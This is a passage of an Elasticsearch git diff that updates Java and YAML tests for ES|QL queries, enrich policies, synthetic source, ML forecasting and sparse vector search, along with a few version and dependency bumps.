org.apache.http.client.methods.HttpPost; import org.elasticsearch.client.Request; +import org.elasticsearch.client.RequestOptions; import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.core.TimeValue; import org.elasticsearch.test.rest.ESRestTestCase; public abstract class AbstractRepositoryAnalysisRestTestCase extends ESRestTestCase { @@ -26,12 +29,18 @@ public void testRepositoryAnalysis() throws Exception { logger.info("creating repository [{}] of type [{}]", repository, repositoryType); registerRepository(repository, repositoryType, true, repositorySettings); + final TimeValue timeout = TimeValue.timeValueSeconds(120); final Request request = new Request(HttpPost.METHOD_NAME, "/_snapshot/" + repository + "/_analyze"); request.addParameter("blob_count", "10"); request.addParameter("concurrency", "4"); request.addParameter("max_blob_size", randomFrom("1mb", "10mb")); - request.addParameter("timeout", "120s"); + request.addParameter("timeout", timeout.getStringRep()); request.addParameter("seed", Long.toString(randomLong())); + request.setOptions( + RequestOptions.DEFAULT.toBuilder() + .setRequestConfig(RequestConfig.custom().setSocketTimeout(Math.toIntExact(timeout.millis() + 10_000)).build()) + ); + assertOK(client().performRequest(request)); } diff --git a/x-pack/plugin/snapshot-repo-test-kit/src/test/java/org/elasticsearch/repositories/blobstore/testkit/integrity/TransportRepositoryVerifyIntegrityActionTests.java b/x-pack/plugin/snapshot-repo-test-kit/src/test/java/org/elasticsearch/repositories/blobstore/testkit/integrity/TransportRepositoryVerifyIntegrityActionTests.java new file mode 100644 index 0000000000000..9eeee8ba6e24b --- /dev/null +++ b/x-pack/plugin/snapshot-repo-test-kit/src/test/java/org/elasticsearch/repositories/blobstore/testkit/integrity/TransportRepositoryVerifyIntegrityActionTests.java @@ -0,0 +1,35 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.repositories.blobstore.testkit.integrity; + +import org.elasticsearch.repositories.RepositoryData; +import org.elasticsearch.test.ESTestCase; + +import static org.hamcrest.Matchers.equalTo; + +public class TransportRepositoryVerifyIntegrityActionTests extends ESTestCase { + public void testEnsureValidGenId() { + TransportRepositoryVerifyIntegrityAction.ensureValidGenId(0); + TransportRepositoryVerifyIntegrityAction.ensureValidGenId(randomNonNegativeLong()); + assertThat( + expectThrows( + IllegalArgumentException.class, + () -> TransportRepositoryVerifyIntegrityAction.ensureValidGenId(RepositoryData.EMPTY_REPO_GEN) + ).getMessage(), + equalTo("repository is empty, cannot verify its integrity") + ); + assertThat(expectThrows(IllegalStateException.class, () -> { + try { + TransportRepositoryVerifyIntegrityAction.ensureValidGenId(RepositoryData.CORRUPTED_REPO_GEN); + } catch (AssertionError e) { + // if assertions disabled, we throw the cause directly + throw e.getCause(); + } + }).getMessage(), equalTo("repository is in an unexpected state [-3], cannot verify its integrity")); + } +} diff --git a/x-pack/plugin/spatial/src/main/java/org/elasticsearch/xpack/spatial/index/query/ShapeQueryBuilder.java b/x-pack/plugin/spatial/src/main/java/org/elasticsearch/xpack/spatial/index/query/ShapeQueryBuilder.java index 68ac10801a40d..3e2d2827ce614 100644 --- a/x-pack/plugin/spatial/src/main/java/org/elasticsearch/xpack/spatial/index/query/ShapeQueryBuilder.java +++ b/x-pack/plugin/spatial/src/main/java/org/elasticsearch/xpack/spatial/index/query/ShapeQueryBuilder.java @@ -9,7 +9,6 @@ import org.apache.lucene.search.ConstantScoreQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.geo.GeometryParser; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -176,6 +175,6 @@ public static ShapeQueryBuilder fromXContent(XContentParser parser) throws IOExc @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/spatial/src/main/java/org/elasticsearch/xpack/spatial/search/aggregations/GeoLineAggregationBuilder.java b/x-pack/plugin/spatial/src/main/java/org/elasticsearch/xpack/spatial/search/aggregations/GeoLineAggregationBuilder.java index 7c8b1545a3a94..9614070bf3339 100644 --- a/x-pack/plugin/spatial/src/main/java/org/elasticsearch/xpack/spatial/search/aggregations/GeoLineAggregationBuilder.java +++ b/x-pack/plugin/spatial/src/main/java/org/elasticsearch/xpack/spatial/search/aggregations/GeoLineAggregationBuilder.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.spatial.search.aggregations; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.metadata.DataStream; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -212,6 +211,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/10_basic.yml b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/10_basic.yml index 5b0492f9e847e..b9d20d4cd40cf 100644 --- a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/10_basic.yml +++ b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/10_basic.yml @@ -555,11 +555,11 @@ FROM EVAL SORT LIMIT with documents_found: - method: POST path: /_query parameters: [ ] - capabilities: [ parameter_for_limit ] + capabilities: [ normalized_limit_error_message ] reason: "named or positional parameters for field names" - do: - catch: "/Invalid value for LIMIT \\[foo: String\\], expecting a non negative integer/" + catch: "/value of \\[limit \\?l\\] must be a non negative integer, found value \\[\\?l\\] type \\[keyword\\]/" esql.query: body: query: 'from test | limit ?l' diff --git a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/160_union_types.yml b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/160_union_types.yml index 3df912715434f..4e714a0c8eff6 100644 --- a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/160_union_types.yml +++ b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/160_union_types.yml @@ -913,8 +913,8 @@ suggested_type: - method: POST path: /_query parameters: [] - capabilities: [recommended_cast] - reason: "uses recommended_cast" + capabilities: [suggested_cast, implicit_casting_date_and_date_nanos] + reason: "date and date_nanos should no longer produce suggested_cast column" - do: indices.create: @@ -969,9 +969,7 @@ suggested_type: - match: { columns.0.original_types: ["aggregate_metric_double", "long"] } - match: { columns.0.suggested_cast: "aggregate_metric_double" } - match: { columns.1.name: "my_date" } - - match: { columns.1.type: "unsupported" } - - match: { columns.1.original_types: ["date_nanos", "datetime"] } - - match: { columns.1.suggested_cast: "date_nanos" } + - match: { columns.1.type: "date_nanos" } - match: { columns.2.name: "my_double" } - match: { columns.2.type: "double" } - is_false: columns.2.original_types diff --git a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/220_explain.yml b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/220_explain.yml index be9163bd2a2fa..3e0eb4f3d07c8 100644 --- a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/220_explain.yml +++ b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/220_explain.yml @@ -6,7 +6,7 @@ setup: - method: POST path: /_query parameters: [] - capabilities: [explain] + capabilities: [explain, no_brackets_in_unquoted_index_names] reason: "new EXPLAIN command" - do: indices.create: @@ -86,6 +86,29 @@ explainQuery: - match: { values.2.0: "coordinator" } - match: { values.2.1: "optimizedPhysicalPlan" } +--- +explainFrom: + - do: + allowed_warnings_regex: + - "No limit defined, adding default limit of \\[.*\\]" + esql.query: + body: + query: 'EXPLAIN (from test)' + + - length: { columns: 3 } + - match: {columns.0.name: "role"} + - match: {columns.0.type: "keyword"} + - match: {columns.1.name: "type"} + - match: {columns.1.type: "keyword"} + - match: {columns.2.name: "plan"} + - match: {columns.2.type: "keyword"} + - length: { values: 3 } + - match: { values.0.0: "coordinator" } + - match: { values.0.1: "parsedPlan" } + - match: { values.1.0: "coordinator" } + - match: { values.1.1: "optimizedLogicalPlan" } + - match: { values.2.0: "coordinator" } + - match: { values.2.1: "optimizedPhysicalPlan" } --- explainDownstream: diff --git a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/40_tsdb.yml b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/40_tsdb.yml index 8d394dee4acd4..e4a6ebc966a8a 100644 --- a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/40_tsdb.yml +++ b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/40_tsdb.yml @@ -707,3 +707,27 @@ to_aggregate_metric_double with multi_values: - match: {values.0.1: '{"min":102.44400024414062,"max":195.10000610351562,"sum":297.54400634765625,"value_count":2}'} - match: {values.0.2: '{"min":64.0,"max":1456.0,"sum":2139.0,"value_count":4}'} - match: {values.0.3: '{"min":123.0,"max":1.9418924E7,"sum":1.9433032E7,"value_count":3}'} + +--- +avg of aggregate_metric_double: + - requires: + test_runner_features: [capabilities] + capabilities: + - method: POST + path: /_query + parameters: [] + capabilities: [aggregate_metric_double_avg] + reason: "support avg aggregations with aggregate metric double" + + - do: + allowed_warnings_regex: + - "No limit defined, adding default limit of \\[.*\\]" + esql.query: + body: + query: 'FROM test2 | STATS avg = avg(agg_metric) | KEEP avg' + + - length: {values: 1} + - length: {values.0: 1} + - match: {columns.0.name: "avg"} + - match: {columns.0.type: "double"} + - match: {values.0.0: 4.904761904761905} diff --git a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/46_downsample.yml b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/46_downsample.yml index ee1a381c6e589..726921ffd09f7 100644 --- a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/46_downsample.yml +++ b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/46_downsample.yml @@ -251,3 +251,111 @@ setup: - match: {values.0.1: 800479.0} - match: {values.0.2: 4812452.0} - match: {values.0.3: 6} + +--- +"Sort from multiple indices one with aggregate metric double": + - requires: + test_runner_features: [capabilities] + capabilities: + - method: POST + path: /_query + parameters: [] + capabilities: [aggregate_metric_double_sorting_fixed] + reason: "Fix sorting for rows comprised of docs from multiple indices where agg metric is missing from some" + + - do: + indices.downsample: + index: test + target_index: test-downsample + body: > + { + "fixed_interval": "1h" + } + - is_true: acknowledged + + - do: + indices.create: + index: test-2 + body: + mappings: + properties: + some_field: + type: keyword + + - do: + bulk: + refresh: true + index: test-2 + body: + - '{"index": {}}' + - '{"some_field": "im a keyword!!!!!"}' + + - do: + esql.query: + body: + query: "FROM test-* | SORT some_field, @timestamp, k8s.pod.uid | KEEP k8s.pod.network.rx, some_field, @timestamp | LIMIT 10" + + - length: {values: 5} + - length: {values.0: 3} + - match: {columns.0.name: "k8s.pod.network.rx"} + - match: {columns.0.type: "aggregate_metric_double"} + - match: {columns.1.name: "some_field"} + - match: {columns.1.type: "keyword"} + - match: {columns.2.name: "@timestamp"} + - match: {columns.2.type: "date"} + - match: {values.0.0: null} + - match: {values.0.1: "im a keyword!!!!!"} + - match: {values.0.2: null} + - match: {values.1.0: '{"min":801479.0,"max":802133.0,"sum":1603612.0,"value_count":2}'} + - match: {values.1.1: null} + - match: {values.1.2: "2021-04-28T18:00:00.000Z"} + - match: {values.2.0: '{"min":530575.0,"max":530600.0,"sum":1061175.0,"value_count":2}'} + - match: {values.2.1: null} + - match: {values.2.2: "2021-04-28T18:00:00.000Z"} + - match: {values.3.0: '{"min":530604.0,"max":530605.0,"sum":1061209.0,"value_count":2}'} + - match: {values.3.1: null} + - match: {values.3.2: "2021-04-28T19:00:00.000Z"} + - match: {values.4.0: '{"min":802337.0,"max":803685.0,"sum":1606022.0,"value_count":2}'} + - match: {values.4.1: null} + - match: {values.4.2: "2021-04-28T20:00:00.000Z"} + +--- +"MV_EXPAND on non-MV aggregate metric double": + - requires: + test_runner_features: [capabilities] + capabilities: + - method: POST + path: /_query + parameters: [] + capabilities: [aggregate_metric_double_mv_expand] + reason: "Have MV_EXPAND not error out when applied to aggregate_metric_doubles (is a no-op)" + + - do: + indices.downsample: + index: test + target_index: test-downsample + body: > + { + "fixed_interval": "1h" + } + - is_true: acknowledged + + - do: + esql.query: + body: + query: "FROM test-downsample | MV_EXPAND k8s.pod.network.rx | SORT @timestamp, k8s.pod.uid | KEEP k8s.pod.network.rx, @timestamp | LIMIT 10" + + - length: {values: 4} + - length: {values.0: 2} + - match: {columns.0.name: "k8s.pod.network.rx"} + - match: {columns.0.type: "aggregate_metric_double"} + - match: {columns.1.name: "@timestamp"} + - match: {columns.1.type: "date"} + - match: {values.0.0: '{"min":801479.0,"max":802133.0,"sum":1603612.0,"value_count":2}'} + - match: {values.0.1: "2021-04-28T18:00:00.000Z"} + - match: {values.1.0: '{"min":530575.0,"max":530600.0,"sum":1061175.0,"value_count":2}'} + - match: {values.1.1: "2021-04-28T18:00:00.000Z"} + - match: {values.2.0: '{"min":530604.0,"max":530605.0,"sum":1061209.0,"value_count":2}'} + - match: {values.2.1: "2021-04-28T19:00:00.000Z"} + - match: {values.3.0: '{"min":802337.0,"max":803685.0,"sum":1606022.0,"value_count":2}'} + - match: {values.3.1: "2021-04-28T20:00:00.000Z"} diff --git a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/60_enrich.yml b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/60_enrich.yml index 8a5d3be6758e3..c8f3c15400b9e 100644 --- a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/60_enrich.yml +++ b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/60_enrich.yml @@ -191,3 +191,59 @@ teardown: - match: { values.1: [ "Bob", "New York", "nyc", "USA" ] } - match: { values.2: [ "Denise", "Tan Son Nhat", null, null ] } - match: { values.3: [ "Mario", "Rome", "rom", "Italy" ] } + + +--- +"Enrich with brackets in policy name": + - requires: + test_runner_features: [capabilities, allowed_warnings_regex] + capabilities: + - method: POST + path: /_query + parameters: [] + capabilities: [ no_brackets_in_unquoted_index_names ] + reason: "Change in the grammar" + + - do: + allowed_warnings_regex: + - "No limit defined, adding default limit of \\[.*\\]" + esql.query: + body: + query: 'from test | enrich "city_codes_policy)" on city_id | keep name, city, country | sort name' + catch: "bad_request" + + - match: { status: 400 } + - match: { error.type: verification_exception } + - match: { error.reason: "/.*cannot.find.enrich.policy.*/" } + + +--- +"Enrich in fork": + - requires: + test_runner_features: [capabilities, allowed_warnings_regex] + capabilities: + - method: POST + path: /_query + parameters: [] + capabilities: [ no_brackets_in_unquoted_index_names, fork_v9 ] + reason: "Change in the grammar" + + - do: + allowed_warnings_regex: + - "No limit defined, adding default limit of \\[.*\\]" + esql.query: + body: + query: 'from test | eval city_code = city_id | FORK (enrich city_codes_policy) (where false) | keep name, city, country | sort name' + + - match: { columns.0.name: "name" } + - match: { columns.0.type: "keyword" } + - match: { columns.1.name: "city" } + - match: { columns.1.type: "text" } + - match: { columns.2.name: "country" } + - match: { columns.2.type: "keyword" } + + - length: { values: 4 } + - match: { values.0: [ "Alice", "New York", "USA" ] } + - match: { values.1: [ "Bob", "New York", "USA" ] } + - match: { values.2: [ "Denise", null, null ] } + - match: { values.3: [ "Mario", "Rome", "Italy" ] } diff --git a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/60_usage.yml b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/60_usage.yml index 1276f026ffdf7..72b518e2228ee 100644 --- a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/60_usage.yml +++ b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/60_usage.yml @@ -146,7 +146,7 @@ setup: - do: {xpack.usage: {}} - match: { esql.available: true } - match: { esql.enabled: true } - - length: { esql.features: 26 } + - length: { esql.features: 27 } - set: {esql.features.dissect: dissect_counter} - set: {esql.features.drop: drop_counter} - set: {esql.features.eval: eval_counter} @@ -228,7 +228,7 @@ setup: - gt: {esql.functions.to_long: $functions_to_long} - match: {esql.functions.coalesce: $functions_coalesce} - gt: {esql.functions.categorize: $functions_categorize} - - length: {esql.functions: 146} # check the "sister" test above for a likely update to the same esql.functions length check + - length: {esql.functions: 137} # check the "sister" test above for a likely update to the same esql.functions length check --- took: diff --git a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/61_enrich_bracket.yml b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/61_enrich_bracket.yml new file mode 100644 index 0000000000000..04db9037d2054 --- /dev/null +++ b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/61_enrich_bracket.yml @@ -0,0 +1,111 @@ +--- +setup: + - skip: + awaits_fix: "https://github.com/elastic/elasticsearch/issues/130740" + - requires: + cluster_features: ["gte_v8.11.0"] + reason: "ESQL is available in 8.11+" + test_runner_features: allowed_warnings_regex + - do: + indices.create: + index: cities + body: + settings: + number_of_shards: 5 + mappings: + properties: + city_code: + type: keyword + city: + type: text + country: + type: keyword + + - do: + bulk: + index: cities + refresh: true + body: + - { "index": { } } + - { "city_code": "nyc", "city": "New York", "country": "USA" } + - { "index": { } } + - { "city_code": "rom", "city": "Rome", "country": "Italy" } + + - do: + enrich.put_policy: + name: city_codes)policy + body: + match: + indices: [ "cities" ] + match_field: "city_code" + enrich_fields: [ "city", "country" ] + + + - do: + enrich.execute_policy: + name: city_codes)policy + + + - do: + indices.create: + index: test + body: + mappings: + properties: + name: + type: keyword + city_id: + type: keyword + city_name: + type: text + - do: + bulk: + index: test + refresh: true + body: + - { "index": { } } + - { "name": "Alice", "city_id": "nyc", "city_name": "New York" } + - { "index": { } } + - { "name": "Bob", "city_id": "nyc", "city_name": "New York" } + - { "index": { } } + - { "name": "Mario", "city_id": "rom", "city_name": "Rome" } + - { "index": { } } + - { "name": "Denise", "city_id": "sgn", "city_name": "Tan Son Nhat" } + + +--- +teardown: + - do: + enrich.delete_policy: + name: city_codes)policy + +--- +"Enrich on keyword": + - requires: + test_runner_features: [ capabilities, allowed_warnings_regex ] + capabilities: + - method: POST + path: /_query + parameters: [ ] + capabilities: [ no_brackets_in_unquoted_index_names ] + reason: "Change in the grammar" + + - do: + allowed_warnings_regex: + - "No limit defined, adding default limit of \\[.*\\]" + esql.query: + body: + query: 'from test | enrich "city_codes)policy" on city_id | keep name, city, country | sort name' + + - match: { columns.0.name: "name" } + - match: { columns.0.type: "keyword" } + - match: { columns.1.name: "city" } + - match: { columns.1.type: "text" } + - match: { columns.2.name: "country" } + - match: { columns.2.type: "keyword" } + + - length: { values: 4 } + - match: { values.0: [ "Alice", "New York", "USA" ] } + - match: { values.1: [ "Bob", "New York", "USA" ] } + - match: { values.2: [ "Denise", null, null ] } + - match: { values.3: [ "Mario", "Rome", "Italy" ] } diff --git a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/logsdb/20_synthetic_source.yml b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/logsdb/20_synthetic_source.yml new file mode 100644 index 0000000000000..0a56c6d74215c --- /dev/null +++ b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/logsdb/20_synthetic_source.yml @@ -0,0 +1,149 @@ +--- +synthetic_source match_only_text with wildcard as parent field: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: wildcard + fields: + text: + type: match_only_text + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: "Apache Lucene powers Elasticsearch" + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo.text: apache lucene + + - match: { "hits.total.value": 1 } + - match: + hits.hits.0._source.foo: "Apache Lucene powers Elasticsearch" + +--- +synthetic_source match_only_text with number as parent field: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: long + fields: + text: + type: match_only_text + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: [1, 5] + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo.text: 1 5 + + - match: { "hits.total.value": 0 } + + - do: + indices.create: + index: stored_source_test + body: + mappings: + properties: + foo: + type: long + fields: + text: + type: match_only_text + + - do: + index: + index: stored_source_test + id: "1" + refresh: true + body: + foo: [1, 5] + + - do: + search: + index: stored_source_test + body: + query: + match_phrase: + foo.text: 1 5 + + - match: { "hits.total.value": 0 } + +--- +synthetic_source match_only_text with scaled_float as parent field: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: scaled_float + scaling_factor: 10 + fields: + text: + type: match_only_text + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: [1.1, 5.5] + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo.text: 1.1 5.5 + + - match: { "hits.total.value": 0 } diff --git a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/ml/forecast.yml b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/ml/forecast.yml index 729f284bde95f..ca399ab3e4c7c 100644 --- a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/ml/forecast.yml +++ b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/ml/forecast.yml @@ -45,7 +45,7 @@ setup: catch: /\[duration\] must be positive[:] \[-1\]/ ml.forecast: job_id: "forecast-job" - duration: "-1s" + duration: "-1" --- "Test forecast given duration is too large": @@ -61,7 +61,7 @@ setup: catch: /\[expires_in\] must be non-negative[:] \[-1\]/ ml.forecast: job_id: "forecast-job" - expires_in: "-1s" + expires_in: "-1" --- "Test forecast given max_model_memory is too large": - do: diff --git a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/ml/sparse_vector_search.yml b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/ml/sparse_vector_search.yml index 2d440f1cf5987..408ddd1ec50c6 100644 --- a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/ml/sparse_vector_search.yml +++ b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/ml/sparse_vector_search.yml @@ -944,7 +944,7 @@ teardown: {"index": { "_id": "11" }} {"content_embedding":{"is": 0.6, "pugs": 0.6 }} {"index": { "_id": "12" }} - {"content_embedding":{"is": 0.1891394, "pugs": 0.1 }} + {"content_embedding":{"cats": 0.1 }} - do: search: @@ -955,13 +955,25 @@ teardown: field: content_embedding query_vector: pugs: 0.5 - cats: 0.5 - is: 0.04600334 + cats: 0.18 + is: 0.2 - match: { hits.total.value: 2 } - match: { hits.hits.0._id: "11" } - match: { hits.hits.1._id: "12" } + - do: + search: + index: test-sparse-vector-pruning-default + body: + query: + sparse_vector: + field: content_embedding + query_vector: + is: 0.21 # 0.2 is the weight threshold for the default pruning config + + - match: { hits.total.value: 11 } + - do: search: index: test-sparse-vector-pruning-default diff --git a/x-pack/plugin/stack/src/main/java/org/elasticsearch/xpack/stack/StackTemplateRegistry.java b/x-pack/plugin/stack/src/main/java/org/elasticsearch/xpack/stack/StackTemplateRegistry.java index a2f8dd91176e2..384c06ec0850d 100644 --- a/x-pack/plugin/stack/src/main/java/org/elasticsearch/xpack/stack/StackTemplateRegistry.java +++ b/x-pack/plugin/stack/src/main/java/org/elasticsearch/xpack/stack/StackTemplateRegistry.java @@ -37,7 +37,7 @@ public class StackTemplateRegistry extends IndexTemplateRegistry { // The stack template registry version. This number must be incremented when we make changes // to built-in templates. - public static final int REGISTRY_VERSION = 16; + public static final int REGISTRY_VERSION = 18; public static final String TEMPLATE_VERSION_VARIABLE = "xpack.stack.template.version"; public static final Setting STACK_TEMPLATES_ENABLED = Setting.boolSetting( diff --git a/x-pack/plugin/watcher/build.gradle b/x-pack/plugin/watcher/build.gradle index ce7c8e5d6311a..f541ca4be58c5 100644 --- a/x-pack/plugin/watcher/build.gradle +++ b/x-pack/plugin/watcher/build.gradle @@ -34,7 +34,7 @@ dependencies { api 'com.googlecode.owasp-java-html-sanitizer:owasp-java-html-sanitizer:20211018.2' runtimeOnly 'com.google.guava:guava:32.0.1-jre' // needed by watcher for the html sanitizer runtimeOnly 'com.google.guava:failureaccess:1.0.1' - api 'com.sun.mail:jakarta.mail:1.6.4' + api 'com.sun.mail:jakarta.mail:1.6.8' api 'com.sun.activation:jakarta.activation:1.2.1' compileOnly "org.apache.httpcomponents:httpclient:${versions.httpclient}" compileOnly "org.apache.httpcomponents:httpcore:${versions.httpcore}" diff --git a/x-pack/plugin/watcher/src/test/java/org/elasticsearch/xpack/watcher/notification/email/attachment/ReportingAttachmentParserTests.java b/x-pack/plugin/watcher/src/test/java/org/elasticsearch/xpack/watcher/notification/email/attachment/ReportingAttachmentParserTests.java index f3b75273b2860..fed491c3a008d 100644 --- a/x-pack/plugin/watcher/src/test/java/org/elasticsearch/xpack/watcher/notification/email/attachment/ReportingAttachmentParserTests.java +++ b/x-pack/plugin/watcher/src/test/java/org/elasticsearch/xpack/watcher/notification/email/attachment/ReportingAttachmentParserTests.java @@ -239,7 +239,7 @@ public void testInitialRequestContainsInvalidPayload() throws Exception { XContentParseException.class, () -> reportingAttachmentParser.toAttachment(createWatchExecutionContext(), Payload.EMPTY, attachment) ); - assertThat(e.getMessage(), containsString("Unexpected end-of-input")); + assertThat(e.getMessage(), containsString("Unexpected end of file")); } public void testInitialRequestContainsPathAsObject() throws Exception { diff --git a/x-pack/plugin/write-load-forecaster/src/internalClusterTest/java/org/elasticsearch/xpack/writeloadforecaster/WriteLoadForecasterIT.java b/x-pack/plugin/write-load-forecaster/src/internalClusterTest/java/org/elasticsearch/xpack/writeloadforecaster/WriteLoadForecasterIT.java index 6cb3a37920eb0..26bf25bf8c82b 100644 --- a/x-pack/plugin/write-load-forecaster/src/internalClusterTest/java/org/elasticsearch/xpack/writeloadforecaster/WriteLoadForecasterIT.java +++ b/x-pack/plugin/write-load-forecaster/src/internalClusterTest/java/org/elasticsearch/xpack/writeloadforecaster/WriteLoadForecasterIT.java @@ -194,6 +194,7 @@ private void setUpDataStreamWriteDocsAndRollover(String dataStreamName, Settings assertAcked(indicesAdmin().rolloverIndex(new RolloverRequest(dataStreamName, null)).actionGet()); } + ensureGreen(); } static void indexDocs(String dataStream, int numDocs) { diff --git a/x-pack/qa/multi-project/core-rest-tests-with-multiple-projects/build.gradle b/x-pack/qa/multi-project/core-rest-tests-with-multiple-projects/build.gradle index f064c97ff296e..ca6cb356bc1ce 100644 --- a/x-pack/qa/multi-project/core-rest-tests-with-multiple-projects/build.gradle +++ b/x-pack/qa/multi-project/core-rest-tests-with-multiple-projects/build.gradle @@ -28,7 +28,7 @@ dependencies { clusterModules project(xpackModule('mapper-constant-keyword')) clusterModules project(xpackModule('wildcard')) clusterModules project(':test:external-modules:test-multi-project') - restTestConfig project(path: ':modules:data-streams', configuration: "basicRestSpecs") + restTestConfig project(path: ':modules:data-streams', configuration: "restTests") restTestConfig project(path: ':modules:ingest-common', configuration: "basicRestSpecs") restTestConfig project(path: ':modules:reindex', configuration: "basicRestSpecs") restTestConfig project(path: ':modules:streams', configuration: "basicRestSpecs") diff --git a/x-pack/qa/multi-project/xpack-rest-tests-with-multiple-projects/src/yamlRestTest/java/org/elasticsearch/multiproject/test/XpackWithMultipleProjectsClientYamlTestSuiteIT.java b/x-pack/qa/multi-project/xpack-rest-tests-with-multiple-projects/src/yamlRestTest/java/org/elasticsearch/multiproject/test/XpackWithMultipleProjectsClientYamlTestSuiteIT.java index 0977eaddd7e06..a5581ef922736 100644 --- a/x-pack/qa/multi-project/xpack-rest-tests-with-multiple-projects/src/yamlRestTest/java/org/elasticsearch/multiproject/test/XpackWithMultipleProjectsClientYamlTestSuiteIT.java +++ b/x-pack/qa/multi-project/xpack-rest-tests-with-multiple-projects/src/yamlRestTest/java/org/elasticsearch/multiproject/test/XpackWithMultipleProjectsClientYamlTestSuiteIT.java @@ -20,6 +20,8 @@ import org.elasticsearch.test.rest.yaml.ESClientYamlSuiteTestCase; import org.junit.ClassRule; +import java.util.Objects; + @TimeoutSuite(millis = 60 * TimeUnits.MINUTE) public class XpackWithMultipleProjectsClientYamlTestSuiteIT extends MultipleProjectsClientYamlSuiteTestCase { @ClassRule @@ -30,7 +32,7 @@ public class XpackWithMultipleProjectsClientYamlTestSuiteIT extends MultipleProj .setting("xpack.ml.enabled", "true") .setting("xpack.security.enabled", "true") .setting("xpack.watcher.enabled", "false") - .setting("xpack.license.self_generated.type", "trial") + // Integration tests are supposed to enable/disable exporters before/after each test .setting("xpack.security.authc.token.enabled", "true") .setting("xpack.security.authc.api_key.enabled", "true") .setting("xpack.security.transport.ssl.enabled", "true") @@ -38,12 +40,20 @@ public class XpackWithMultipleProjectsClientYamlTestSuiteIT extends MultipleProj .setting("xpack.security.transport.ssl.certificate", "testnode.crt") .setting("xpack.security.transport.ssl.verification_mode", "certificate") .setting("xpack.security.audit.enabled", "true") + .setting("xpack.license.self_generated.type", "trial") + // disable ILM history, since it disturbs tests using _all + .setting("indices.lifecycle.history_index_enabled", "false") .keystore("xpack.security.transport.ssl.secure_key_passphrase", "testnode") .configFile("testnode.pem", Resource.fromClasspath("/org/elasticsearch/xpack/security/transport/ssl/certs/simple/testnode.pem")) 